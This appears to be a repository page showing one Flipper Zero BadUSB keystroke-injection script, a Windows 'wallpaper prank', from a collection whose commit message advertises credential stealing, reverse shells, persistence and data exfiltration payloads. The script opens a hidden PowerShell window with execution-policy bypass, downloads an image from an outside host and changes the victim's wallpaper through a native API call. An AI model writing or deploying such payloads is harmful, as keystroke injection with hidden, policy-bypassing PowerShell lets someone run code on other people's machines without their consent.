Files
Flipper/BadUSB/NullSec-BadUSB/17_WallpaperPrank.txt
T
bad-antics 4f61dec96b Add NullSec BadUSB payload collection
Added 25 BadUSB payloads for Flipper Zero:
- System reconnaissance (Windows/Linux/Mac)
- Credential extraction & WiFi password stealing
- Reverse shells (PowerShell & Bash)
- Defense evasion & persistence
- Data exfiltration (keylogger, webcam, clipboard)
- Harmless pranks

All payloads include proper headers and documentation.
Cross-platform support for Windows, Linux, and macOS.
2026-02-01 13:17:33 -08:00

15 lines
608 B
Plaintext

REM ========================================
REM NullSec Flipper Zero BadUSB
REM Payload: Change Wallpaper
REM Target: Windows 10/11
REM ========================================
DELAY 1000
GUI r
DELAY 500
STRING powershell -w hidden -ep bypass -c "Invoke-WebRequest 'https://i.imgur.com/FJYwR6P.jpg' -OutFile '$env:TEMP\wp.jpg';Add-Type @'
ENTER
STRING using System.Runtime.InteropServices; public class W{[DllImport(\"user32.dll\",CharSet=CharSet.Auto)]public static extern int SystemParametersInfo(int a,int b,string c,int d);}
ENTER
STRING '@;[W]::SystemParametersInfo(20,0,\"$env:TEMP\wp.jpg\",3)"
ENTER